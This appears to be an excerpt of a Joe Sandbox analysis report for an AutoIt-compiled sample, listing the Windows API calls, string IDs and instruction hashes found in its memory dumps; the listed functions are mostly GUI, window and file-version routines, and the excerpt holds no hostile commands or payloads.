                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      APIs
                      • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                      • IsWindowVisible.USER32(?), ref: 0048364B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: BuffCharUpperVisibleWindow
                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                      • API String ID: 4105515805-45149045
                      APIs
                      • SetTextColor.GDI32(?,00000000), ref: 0048A630
                      • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                      • GetSysColor.USER32(0000000F), ref: 0048A66D
                      • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                      • SelectObject.GDI32(?,00000000), ref: 0048A696
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                      • GetSysColor.USER32(00000010), ref: 0048A6C9
                      • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                      • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                      • DeleteObject.GDI32(00000000), ref: 0048A6E6
                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                      • FillRect.USER32(?,?,00000000), ref: 0048A763
                      • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                        • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                        • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                        • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                        • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                        • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                        • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                        • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                        • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                        • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                        • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                        • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                        • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                        • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                      • String ID:
                      • API String ID: 3521893082-0
                      • Opcode ID: deb33b71fda49ccf7e45a1d74aaf8aa8c22477eef8c960017b5c478ece92b36b
                      • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                      • Opcode Fuzzy Hash: deb33b71fda49ccf7e45a1d74aaf8aa8c22477eef8c960017b5c478ece92b36b
                      • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                      APIs
                      • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                      • DeleteObject.GDI32(00000000), ref: 00402CE8
                      • DeleteObject.GDI32(00000000), ref: 00402CF3
                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                        • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                      • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                      • String ID: 0
                      • API String ID: 464785882-4108050209
                      • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                      • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                      • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                      • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                      APIs
                      • DestroyWindow.USER32(00000000), ref: 004774DE
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                      • GetClientRect.USER32(00000000,?), ref: 0047763F
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                      • GetStockObject.GDI32(00000011), ref: 004776A2
                      • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                      • DeleteDC.GDI32(00000000), ref: 004776C8
                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                      • GetStockObject.GDI32(00000011), ref: 004777A6
                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                      • API String ID: 2910397461-517079104
                      • Opcode ID: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                      • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                      • Opcode Fuzzy Hash: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                      • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                      • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                      • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorMode$DriveType
                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                      • API String ID: 2907320926-4222207086
                      • Opcode ID: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                      • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                      • Opcode Fuzzy Hash: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                      • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                      • API String ID: 1038674560-86951937
                      • Opcode ID: 3cacba058254b3238dd2174b4c1972a88315ba911dd2d5784c2a2e9dd56d3911
                      • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                      • Opcode Fuzzy Hash: 3cacba058254b3238dd2174b4c1972a88315ba911dd2d5784c2a2e9dd56d3911
                      • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                      APIs
                      • GetSysColor.USER32(00000012), ref: 0048A903
                      • SetTextColor.GDI32(?,?), ref: 0048A907
                      • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                      • GetSysColor.USER32(0000000F), ref: 0048A928
                      • CreateSolidBrush.GDI32(?), ref: 0048A92D
                      • GetSysColor.USER32(00000011), ref: 0048A945
                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                      • SelectObject.GDI32(?,00000000), ref: 0048A964
                      • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                      • SelectObject.GDI32(?,?), ref: 0048A97A
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                      • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                      • GetSysColor.USER32(00000011), ref: 0048AA4B
                      • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                      • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                      • DeleteObject.GDI32(?), ref: 0048AA89
                      • SelectObject.GDI32(?,?), ref: 0048AA8F
                      • DeleteObject.GDI32(?), ref: 0048AA94
                      • SetTextColor.GDI32(?,?), ref: 0048AA9A
                      • SetBkColor.GDI32(?,?), ref: 0048AAA4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                      • String ID:
                      • API String ID: 1996641542-0
                      • Opcode ID: 694946cc6e67fe786b141e761a5a44e56aae5e79ce6f6dba3698824a9b67d4c5
                      • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                      • Opcode Fuzzy Hash: 694946cc6e67fe786b141e761a5a44e56aae5e79ce6f6dba3698824a9b67d4c5
                      • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                      APIs
                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                      • CharNextW.USER32(0000014E), ref: 00488B01
                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                      • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                      • _memset.LIBCMT ref: 00488C44
                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                      • _memset.LIBCMT ref: 00488CEC
                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                      • DrawMenuBar.USER32(?), ref: 00488EC3
                      • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                      • String ID: 0
                      • API String ID: 1073566785-4108050209
                      • Opcode ID: 34291efbb9a5d2a10ac76ec0c270521a8124600f2d75c4455e21dd13b58d0ff0
                      • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                      • Opcode Fuzzy Hash: 34291efbb9a5d2a10ac76ec0c270521a8124600f2d75c4455e21dd13b58d0ff0
                      • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                      APIs
                      • GetCursorPos.USER32(?), ref: 004849CA
                      • GetDesktopWindow.USER32 ref: 004849DF
                      • GetWindowRect.USER32(00000000), ref: 004849E6
                      • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                      • DestroyWindow.USER32(?), ref: 00484A74
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                      • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                      • IsWindowVisible.USER32(?), ref: 00484B29
                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                      • GetWindowRect.USER32(?,?), ref: 00484B70
                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                      • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                      • CopyRect.USER32(?,?), ref: 00484BC7
                      • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                      • String ID: ($0$tooltips_class32
                      • API String ID: 698492251-4156429822
                      • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                      • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                      • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                      • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                      APIs
                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                      • _wcscpy.LIBCMT ref: 00464500
                      • _wcscmp.LIBCMT ref: 0046450B
                      • _wcscat.LIBCMT ref: 00464521
                      • _wcsstr.LIBCMT ref: 0046452C
                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                      • _wcscat.LIBCMT ref: 00464591
                      • _wcscat.LIBCMT ref: 00464598
                      • _wcsncpy.LIBCMT ref: 004645C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                      • API String ID: 699586101-1459072770
                      • Opcode ID: f5e5018a0ed040561f79e9b5c06771cacad600aedc532658bf007cd18df33af5
                      • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                      • Opcode Fuzzy Hash: f5e5018a0ed040561f79e9b5c06771cacad600aedc532658bf007cd18df33af5
                      • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
                      APIs
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                      • GetSystemMetrics.USER32(00000007), ref: 004028C4
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                      • GetSystemMetrics.USER32(00000008), ref: 004028F7
                      • GetSystemMetrics.USER32(00000004), ref: 0040291C
                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                      • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                      • GetStockObject.GDI32(00000011), ref: 004029CA
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                        • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                        • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                        • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                        • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                      • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                      • String ID: AutoIt v3 GUI
